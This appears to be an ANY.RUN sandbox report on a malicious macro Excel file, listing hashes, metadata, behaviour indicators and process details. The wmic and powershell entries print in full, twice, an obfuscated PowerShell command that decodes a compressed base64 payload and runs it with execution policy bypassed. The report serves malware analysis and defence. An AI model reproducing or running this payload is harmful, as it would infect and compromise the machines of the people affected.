File name:

sample2.XLS

Full analysis: https://app.any.run/tasks/ba82eb63-55c8-47d1-976f-a40e6a9c7456
Verdict: Malicious activity
Analysis date: July 17, 2019, 08:09:16
OS: Windows 10 Professional (build: 16299, 32 bit)
Tags:
macros
macros-on-open
maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Jul 16 12:19:40 2019, Security: 0
MD5:

9582B06BFF0F2B43D6693150FCB49C6A

SHA1:

2A90CA7964576B9210C8F35234214F32B412684E

SHA256:

1145EEE29B0805AFBB9CF03FA578CF79A1F94C43125AE6F3D2867810248FB555

SSDEEP:

3072:PjvlYkRIPPm3eNCZmbpoahZhC0cixIiG0iIFLR8m9xe0VukmBj:rvlYkRIPPm3eNCZmbpoahZhC0cixIiGb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • EXCEL.EXE (PID: 3584)

  • SUSPICIOUS

    • Executed via WMI

      • wMIc.exe (PID: 2288)
      • powErsHell.exe (PID: 300)

    • PowerShell script executed

      • powErsHell.exe (PID: 300)

    • Reads Environment values

      • powErsHell.exe (PID: 300)

    • Application launched itself

      • rundll32.exe (PID: 2716)

    • Uses RUNDLL32.EXE to load library

      • powErsHell.exe (PID: 300)
      • rundll32.exe (PID: 2716)

    • Creates files in the user directory

      • rundll32.exe (PID: 2716)

  • INFO

    • Reads the software policy settings

      • powErsHell.exe (PID: 300)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 3584)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3584)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: autore
Software: Microsoft Excel
CreateDate: 2015:06:05 18:19:34
ModifyDate: 2019:07:16 11:19:40
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: 20190716-83748
HeadingPairs:
  • Fogli di lavoro
  • 1
CompObjUserTypeLen: 42
CompObjUserType: (Foglio di lavoro di Microsoft Excel 2019
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
56
Monitored processes
8
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe rundll32.exe no specs rundll32.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
300powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('ZVjHsttIlv0VLSZGUkEtkLBETfQCJLz3TlELEJbw3lX0vzegmEVPzItgAu/eRJprzj2Z//3l27ds+fL1j5oa/vj6/WdD1skv+Mf9/gP66x9C+2m+fv1+dvkK33n5K/D173z+1z+/kZT29/1ff99Owb/O9y//SAV6g5mz+XH+bptwKujt+9n+z89v3xZy+IRvif5y6v6QKeOP83lOFP6fifjmlF6KL998/8un/Wla5+cDTcpDQlKJ8e0Sj6fIP3+jldQ/+fOl/RmpsmYko8m3zU+KZqrwlFq0ORl0KH/78uscSE5qdfBNa0jC+q8vv15q49CG9defZ8c/GUOtn6RJY8g4GXyTfTtXYAVV/gFwPvI9cB+eY83NShCbkwN0c1YyBjnWnvsyMtrYL4uMN0NEBhLZEzTmu9eSNnPSHbpE+mBzLJMIx46Doit2T5eJCBYQTIcB5JdHhYMYIcNOisPmHQKwFD4HW8DHezmfsIejIAjiKB5rOA7jt/sRP9Y4BgjMw2sAADjuAKdHiqNwMQFJr+DnXzOCRZ7GICCAIEFgDgLOMIHCSwoWnYXhABg8UZBYhh0Hzyke9zhOU2BPljtOHQf3mOEx0sAn6J3drw6Le7XpMljMHUcAggCSeQEi8Fpn8T4wAsXo960bME1TDmquxD5GOtRyHTXxPHcZiy5OwjID7tLsPjoUaYBm2FFGwJe8xxwZs3Pcu0fQ3eOC0O4wTH7egOPN3E0PDExiCuAjdJJgw1xIctMdN730c84MWvYYxttxviZA46goRlgO2LwDghODEeycpc1zabkHwoI6yoJgcKgSRDcsTv/IY3PDRjUKewCtYPIjGiFqSyN2jI/cpaHInx8+m74XaReWYeYJ7+1PTcrj8vCRg5r/7I9uqZJ3esCsd3k+lR86YFIws0fpravSYBsRfMzeb/bUvugbCseLdr4+67NRHMpKxGAT9830fB2Bqpa7H0RvrQJ2quOKMMN8gxZ2STvLjCUuuYMDL6rJ3UKIRAqOAxgFB7lc8sLv8hTU50acWBOX4iiCB5bVCopH/sOLYOLs5GFBTlRzOO1WIdgbhsgJdGdVgW6WcY6ifsI1LnXHhdZ3e6N9oTOdvbhGt8sIauRpZXP+7SiCVRz8OMfgMEshce9n49Zg8XvkMj7t93tDz8m1IpYm7M8y4zd+GqjVKw0fWu4ZIrtV+Xzp+1KiSH1/8JIS4dXZH1L9GpkuH0Z6DgRN/Wbdp4e2Lj+nMZK8eRfSXyxZQJX6JmOH+BCgeHbGPhNwPkgb1qRXqqxoio0h3Bn5ZV4Wy0Znv3O7/QncRaf5vFOZVn9Em674qBJcuIG2Bzra0wVPZu+QL5SNz9eOF6TzUY6zuj4EPCW8yOj3FT4ExkCafoOqnvXBAemURz/7gx1hIXoZyjbONt/ORiw7qxbupUd6Prk6l5xSKistWc3QHJjVqEmgW3LuxOflGoqyQzpR1FAH7RFynGqulzYjzpj1LGCXSVIkergKRzqw99f5ge6eTdDLr77tSmbIXICvsJF2aXA2FIWT6IgzxidDOBZDQs3HIVM95o3LVEKmVQCdfgR2SVY/jHvNOaXEhLoIXWmfhwW8s+TVctMFOh1jZTdxZfDarMtmj2iWBMYw+YB6BgRzk1yrkEsX05TXSo4vcw+0wXtdML0KVVcTkNvWBmWIHY3SV1cqNV+RPdjGnCdMFYxJWM3JBZmSHudZEQ3mxt9fZuBm5XScq/h0Dod26k5oh7GbFGasvX3tvt5Z2x7LdOWYnO3xWcrI4JSHS0c3YXRoJiyazzwnnqFb+5SOPRF7aXoEZRiakXayJq1gl5RMynGMMgVM7sTwBMd+eTH2OhqG/qGpc7h9AXHm9vlAQOKgH2tuPdPs4PXpU8DNcIZgje9B//qdquVwJUpnNpajXpEDkDIo9m1cUy6ZvVj9FKlbQAkQDR3IzJgoUFwyjrqLryAUkryMqz5HpNmLb0B0aUjh0Vq9mW7l+V+W4HUJXRHpRK8856nRPQBFfGfiPLS7bD913xQuC8giaBbR6yUi9zy6HVBCFvtqxYn4uYZpbuUwkbVS6kqWkMj8KYeSee9kEMxI8Jk/+LYn+31hMUl4YqqoQTwrrI5pPvfgpXCijSYfAnsyk+VBy+eC3uf+VFbtyaUmJzj0x4ExM1TbamYO1INIc87dWQroj15cVdrYaZF0tFAXBuJtDFTOndKJ0kS7eNhv/AxtA9lbWW9xmIQtVCok3uSKjPwoz+5GtwKP0zF4AdkYea7sdaa9jD51x+oV7EU3fwZ2Itkszu937E47yeM1DfQMWLJS4ufS/A9/tOXSnt8bIq1eXlsVA0mcaRbQu2wOh6QK0vvChMcnmPLmcmPtv5MmXJXEqt9DwF3sBqfXMhG4wArlkMCKajaeQTzUWHbM8jOtcb8hZdptYwiSC8+l8wm562WTaaRK9eJuTHX7qdzEnwvo4Gx+223clzKzAWDmFbzIuYaCvtF7YDt2vvXPwLjKivuq6YWgEYJG0eRhDC+jDxJRfbnx70ihpSKXyKJlO9dB+1QI7YhvSb4Hxv1RMnfQaV6Hjw1maBKuS1iNEQTcC9GVYE5udjzYCay/b2/h3j8Bni1vjsMWkEPldO1/lI8FfOrC2TN14G8i7tYGaj4u17uodKH149bNXAemb0ibCN3O5wvOsGYY72/f//QnanGn3bZuWgFw6WCg6Ju0a2o0a8B39nnBMx8r7dMeLmur+ZXcpp4SWBi667sK+/rVlE0LV+ap6EHhznmmZ5XNxfMcf5vIRK1eNhrFEaJZJk7WAuRw7uv2uHwnB4Mwq/5qmS8RDtEplFqkBjBTzR4r3Z18o6T8iENguriCwmPKxTmy8OIybBp24itrny2Wr72E17sTnxxRBPvn8dsdxsrSEZhde72HF9wbTSTV4Yc7ikWi4fWUXHjwMPtZ94eKtLX4moOAGq0lybvGLFPVozmwMtLl37YVbs+J20TLEcVxQkRD1XGpjR+ZZvW2R7ofgrwmYclwJHDXj60rTDV9Lm83Z+yNEFFhiuic9qHI80Tu+SiJITTieR92XFvOiYUAyc282+lY3GReVTNI4kxGRJjpYnVKD+dlxq1CFLfeUrW3KN5wNnpcWettzHZAtp1OV1Wn2liJMB3GwOTGvEI32IvoPR7bQef33Gr4pSMM9FZLz08+9OjIKCqTieOAIkENJQpPOUct4OSbQxkAV8KZcGpfGAC+1Y3LY4RACTyr3WD7nlSFLta2cqvyF9vI3E3wY0O05xUt9MeY2dH7WnlfMmg4+d2FfHty0CyDoCXf0/XtrHsMVyRS+TBQ6KQivBNwAnKMbx1pbvrrclBMU+5WbCZLxW+DXMb7uPsqNQJV37x2WtkIEe4iJjQYK7SCFlkNig31M5/F9g7LcN5l+7PDac9oJ2wfKU3r6th2izc8pqAB6Dk7ZIR/06+IXtZnNQE2r1xOS23bChvHeY/O0xFuRP+5eVVcXeAeyde6As/r2meNL57anDkZPaEVLct8wxOwu4kKT2MzbFC+M8J8ty+3oe4lizt1BDcwQxtUqAk9r4NQxTBVB5UHbRuy38zpUabwwSasfnH40qf5LUUh6pkhV/xS7DPkeJrrtUR2Gn3c95Kq5oxW9Nwjnim6v5O+YKQnL8UF87jYjPtUKwSw/SIWi8y3Gjh6Hbav32BpZO50JMelaAcfUTrt82TDdePi/dCHrKBUXf1AVYAc/kUJuq7hr+Sm4mfCor2hP9ptkrBX6IkyFEmGasPhFfubrxXQUuf0JLdb/nq18nDbToqp0FaZuczxlO0cq1tdphAEcatWva0vtxGD214R1PPdNO4mJBP9SNM+fbcAx2O3KyOD12+cd1ozhFDnsx1VRPhEhthX7GOy4xlCLEShvOU2NuxBFoa1aRnCKu5XfgM89bkL6ZZNuGG75YhK1MNBzMEmJIrX5Nk0JqFgoeW5xcATO+4Pkctvnjsi2IcnjBtWVYriE8zFVbU85pZxLzQMes7YzHmCaTvlmycGxt/ocqXlA3zr3XqePrykxLy+Rh8nSYVioVR3kvVgml3rEXpguffwU9Vcq4LO/AOLbnDXZsdyE4ZwPbLG5WRNILFQE3bQ87enlVcRFRkigGssKyQ6JdraAIQVpyjxy1Tfi/qgmBV7l2jCnKnViGy57ZG+HfOhZa4xoxtgcacFrhOqz9oo2xiCgWgfsTXERO3i4b3a1ChUbSaN/MuaxvQYU/U6tR2fi+eImzIQWKp0bcz0IjQuIn98uKYjqMhBMl8rW07crYE1IxkCcX0P78enL+scZOzlZhh3ifSUF1f7FwQUzUch3d1VX+SVSBzv8698LiXmHOHSb/PAHfxd8hQo70CjDmQB15K4eH7Y7YLyFYuEZJmetiRfNMMkFhlbL3Z6DB12W5/ZfWxzZ6yNN52EojqjSVAVvZQhD7xg9mtTu7xL5V1Qmm7yTUbFokn6PG9C/DqGokJMGEUY7Tz44G9a9Wq+4iYmPzhdLsZsSFiqkwoRuy40XAuO/FBVmiIJit4n96zoZiy8Anbkmfg8KRZMS90sMjEDqZ0W+8JmRY5lzliRdgskss+7ydJdSveeD0EIp5qgag9b9YF9qJu97mSBBT4ped21uwnItwO0lI/86aY+gXK4uF8GzKIDEWGK9WUCMvO3yyQNW9OPG9O7Mxn6fmG9YOjT1TS5Vs0olaHrYW48xigbqXiP8VjQGYlW4JYQX1Uun1DSSuUotClqmo41VJlUD1L5qXpnCEixy9wJdpMogQtZXXPEBNSoMKL09HGTAdLiSFg2pMrFAfVhTvl2y7HoIrV8TlVNmbeZfgjwiN4jVwePTnjJ2ENl0xOjr9Cka3KVOOVinLLgbpoAl5jeXEXnZut9JEryRky+7fP6ph9gMX9ETbZmCX4XpK/s6jujU7OOYjVO56v08hqvDpohx+buEBu3F7yzcBa0Ue8iAzquxEhNFfkLIrDWpB4L5ngbCIFD5c9P7MGET+HASBQWsGEr3WE/5osf69Po+4vTugSyWiEYJ3D0zkofkua8OeLqaI27hzU08SD2ax/J6u0dz/KKpqcMqC9v1OoSj35DwttNgVw++ZWUVJk1BYij02oPEZ/uugq7yW3HxE/RxIslAmQWMPFedO7849VxpMw3LdYNpYIJVbQqB1n1g5c0dMgFrrxcp+poyCd/R9ohEuCjnnscIui5U9HWBuYrdp0H7co1t62kVst2N3mgM7Hz6mDyrT0x5tk7vOUkNJLgUT4g9lNl1A/2oq6j6VWY8IngniQctS3BnKirqzpRWAr58EP63Ycpp80FiG/xrq4WmykuRr3JKuEcWJtHRYB3k79Kn+dZk8SwRAG0EqMKvCjH1gyAwMKCCwgW1Y1YcCAGJE+92B6XLAS4XJxyOiACfHghAaZKChJ3+OyMW1dpBlNwZicXRDsw4d6nuMNT7e3ACABuj3/+vqT88cvczYmuf/Ltz7M8aUZijnyrXNeR3fD7OlKRWyr5688/KTo69QNtmt+///jyy6K36WeiRGrMN+xf52R//kmOEc9///5zoEnKUhMl/vbl+9fvPw1ak8gX/b9Xrz++/td/ys5FfP3xa7SMzznKrxcXDn/BxH/oSUr7f3rk+/cv/wY=' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')C:\WINDOWS\System32\WindowsPowerShell\v1.0\powErsHell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
876C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:260 WinX:0 WinY:0 IEFrame:00000000C:\WINDOWS\system32\rundll32.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
wMIc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
2288wMIc 'prOcess' "cALl" crEAtE "powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')"C:\WINDOWS\system32\wbem\wMIc.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2716"C:\WINDOWS\system32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 260C:\WINDOWS\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2816"C:\WINDOWS\system32\rundll32.exe" /s DllRegisterServerC:\WINDOWS\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
